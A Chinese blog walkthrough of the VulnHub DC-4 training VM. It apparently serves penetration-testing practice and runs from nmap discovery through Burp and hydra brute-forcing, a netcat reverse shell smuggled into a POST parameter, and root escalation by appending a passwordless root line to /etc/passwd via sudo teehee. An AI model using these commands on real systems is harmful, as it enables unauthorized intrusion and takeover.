当前位置: 首页 > article >正文

VulhubDC-4靶机详解

项目地址

https://download.vulnhub.com/dc/DC-4.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

nmap -A -p- 192.168.47.145

发现开放22和80端口

访问http://192.168.47.145

发现是个登录界面

尝试使用BP抓包进行爆破

发送到Intruder模块

载入密码字典,开始攻击

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录

登录成功

漏洞利用

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包

发现radio可以修改

设置监听
nc -lvvp 8888

反弹shell

注意原数据包空格用+代替的,所以我们也用+来代替

nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功

获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

提权

四处翻翻

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中

使用hydra命令进行爆破
hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145

爆破出来密码是jibril04

使用ssh连接

连接成功

尝试查看刚才没权限的那个文件
cat /home/jim/mbox

看上去像是收到一封邮件

去var/mail找找
cat /var/mail/jim

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户

登录成功

查看权限

发现charles有teehee命令的权限

使用teehee创建一个root用户
echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

添加成功

切换账户

发现flag.txt在/root目录下

查看flag


http://www.kler.cn/a/310236.html

相关文章:

  • AcWing 302 任务安排 斜率优化的dp
  • 设计模式-七个基本原则之一-迪米特法则 + 案例
  • react的创建与书写
  • [HarmonyOS]简单说一下鸿蒙架构
  • 蓝凌OA-EKP hrStaffWebService 任意文件读取漏洞
  • yolov7论文翻译
  • Linux系统性能调优技巧详解
  • 『功能项目』回调函数处理死亡【54】
  • docker基础学习
  • C++调用C# DLL之踩坑记录
  • Oracle 数据库安装和配置教程
  • 每日学习一个数据结构-红黑树
  • 电脑怎么录屏?四款录屏工具分享
  • C++ | Leetcode C++题解之第416题分割等和子集
  • python简单易懂的lxml读取HTML节点及常用操作方法
  • 前端大模型入门:掌握langchain的核心Runnable接口(一)
  • 全面升级!最新版抖音蓝V商家采集软件,海量资源一网打尽
  • redis集群常用命令梳理
  • 高级java每日一道面试题-2024年9月17日-框架篇-什么是ORM框架?
  • C++---类与对象一
  • wpf 使用Oxyplot 库制作图表示例
  • QT 6.8 C++ snap库 连接西门子PLC
  • 激光雷达点云处理—学习随记
  • 「数据科学」清洗数据,真实数据集中缺失值的查看与处理
  • 高效开发,从暗藏玄机的文件系统开始—合宙Air201资产定位模组LuatOS
  • 产品经理学习笔记